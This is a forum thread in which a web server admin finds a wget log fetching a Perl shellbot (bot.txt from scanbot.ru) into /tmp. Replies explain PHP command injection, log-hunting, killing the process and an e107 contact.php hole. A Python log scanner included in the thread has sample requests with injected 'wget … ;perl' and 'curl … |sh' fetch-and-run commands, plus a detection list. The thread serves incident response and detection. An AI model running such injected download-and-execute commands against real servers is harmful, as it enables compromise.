Can anyone please tell me what this is:

Code:
--2010-06-16 23:28:21-- http://scanbot.ru/bot.txt
Resolving scanbot.ru... 85.159.63.185
Connecting to scanbot.ru|85.159.63.185|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28717 (28K) [text/plain]
Saving to: `/tmp/phpRaCehS'

0K .......... .......... ........ 100% 1.13M=0.02s

2010-06-16 23:28:21 (1.13 MB/s) - `/tmp/phpRaCehS' saved [28717/28717]

sh: curl: command not found
Died at /tmp/.s line 20.
sh: curl: command not found

Just saw that in my error log; using Google revealed nothing really. I'm guessing some malware/exploiter, but how can I remove this please? Thanks in advance for any assistance.
I'd be looking very closely for that file, any other hidden or script files in /tmp, and through your access logs for requests that include things like "wget", "curl", "perl", and such. Basically, script kiddies try to exploit vulnerabilities in php etc by causing a script (something like phpbb, geeklog, etc) on your server to run commands, such as downloading and running hack scripts from another site. They like to use /tmp as working space as it is often world read/writeable, which helps them get around file system permissions.
Possibly the main script was downloaded to the home directory of the website that was exploited, and it may clean up after itself to cover its tracks. Search the access logs of all your sites to find any URL request that has those commands in it. That will help you narrow down how they got in, and most likely, which web scripts you need to upgrade or report to the developers as having an exploit. Might be time to have another look over your security also, even though this attempt seems to have failed.
To be honest, it's a bit of a guess. They would use commands that can cause a file to be downloaded (curl was in the log you posted, wget), and then perhaps be unpacked (tar, unzip, rar), and then executed (sh, perl, php). Just to give some examples. The time stamp of the log you posted might give you some help finding where to look in the logs, too.
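The log search the replies above describe (requests whose parameters carry downloader or interpreter names such as wget, curl, perl or sh) can be scripted rather than done by eye. The following is an added example, not code posted in this thread: it parses Apache combined-format access-log lines, percent-decodes the request target repeatedly (double-encoding is a common way to hide injected commands from simple greps), and reports lines that mention one of those tools, together with whether shell metacharacters were present and which script on the site received the request. The log lines, IP addresses and the example.invalid hostname are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access-log lines for demonstration only;
# the injected commands, addresses and example.invalid host are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Jun/2010:23:28:20 +0000] "GET /index.php?page=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Jun/2010:23:28:21 +0000] "GET /contact.php?x=;wget%20http://example.invalid/bot.txt%20-O%20/tmp/x;perl%20/tmp/x HTTP/1.1" 200 312 "-" "libwww-perl/5.8"
198.51.100.4 - - [16/Jun/2010:23:30:02 +0000] "GET /images/logo.png HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
198.51.100.5 - - [16/Jun/2010:23:31:10 +0000] "POST /forum/posting.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Jun/2010:23:32:45 +0000] "GET /index.php?cmd=curl%2520-s%2520http://example.invalid/s%2520%7Csh HTTP/1.1" 200 120 "-" "curl/7.19"
"""

# Apache "combined" format: ip ident user [time] "METHOD target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Downloader and interpreter names that an injected command line chains together.
# The lookbehind keeps "index.php" or "/perl/" paths from matching; only a bare token does.
TOOLS = ("wget", "curl", "fetch", "lwp-download", "perl", "python", "php", "sh", "bash")
TOOL_RE = re.compile(r'(?<![\w./-])(' + '|'.join(map(re.escape, TOOLS)) + r')(?![\w.-])', re.I)

# Shell metacharacters used to separate the injected command from the real parameter.
META_RE = re.compile(r'[;|`]|&&|\$\(')


def decode_target(target, rounds=3):
    """Percent-decode until the string stops changing (bounded), to undo double-encoding."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_request(target):
    """Return (decoded target, sorted tool names found, whether shell metachars are present)."""
    decoded = decode_target(target)
    tools = sorted({t.lower() for t in TOOL_RE.findall(decoded)})
    return decoded, tools, bool(META_RE.search(decoded))


def find_suspicious(log_text):
    """Scan access-log text and return one finding per request naming a downloader/interpreter."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        decoded, tools, has_meta = inspect_request(entry["target"])
        if tools:
            findings.append({
                "ip": entry["ip"],
                "time": entry["time"],
                "status": entry["status"],
                "script": decoded.split("?", 1)[0],  # which page on the site took the hit
                "decoded": decoded,
                "indicators": tools,
                "shell_metachars": has_meta,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} -> {f['script']} indicators={f['indicators']} "
              f"metachars={f['shell_metachars']} status={f['status']}")
        print("   decoded:", f["decoded"])
```

Run it against a real log by replacing SAMPLE_LOG with the file contents (or reading each vhost's access log in turn); the "script" field is what points at the vulnerable PHP file, and the timestamp can be matched against the wget output from the error log. A 200 status on such a request is the worrying case, since it means the script accepted the parameter rather than rejecting it.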
I'm now running 100% CPU. Some Perl script is using it all:

3747 www-data 20 0 34088 4580 1400 R 100 0.4 157:27.73 perl
I may have been hasty in saying it looked like that attempt failed. I directed you to look for the source, but don't forget to remove the payload that was saved in /tmp/phpRaCehS. Really have a close look in /tmp at what's in there. That payload file was 1.13M in size. Anyway, that bot.txt looks to be an irc file sharing bot. Kaspersky identifies it as Backdoor.Perl.Shellbot.a.
There was an empty file there, but with another name. I have deleted that, but nothing else is there.
If you haven't already killed that process, you might like to try and find more about it with ps -efww. That will show the command arguments, which will hopefully show what file perl is running. Then, definitely kill that process. It looks like that bot is more in-depth than what I first thought (I don't read Portuguese..). Then you can start to clean up. http://translate.google.com.au/tran...K&prev=/search?q=sk12pack&start=10&hl=en&sa=N
Thanks again. I have killed the process, and closed off some of my sites that are not needed. CPU usage has now dropped. I will try and clean up later.
Do you run the e107 website system? I found out that this was the culprit on my system. Some security hole in PHP-code caused others to execute malicious perl-scripts on my server.
There is more info on www.e107.org, but afaik it was the "Contact.php" file that was the problem. Although my problem was not like that, it still came in from e107 in some way.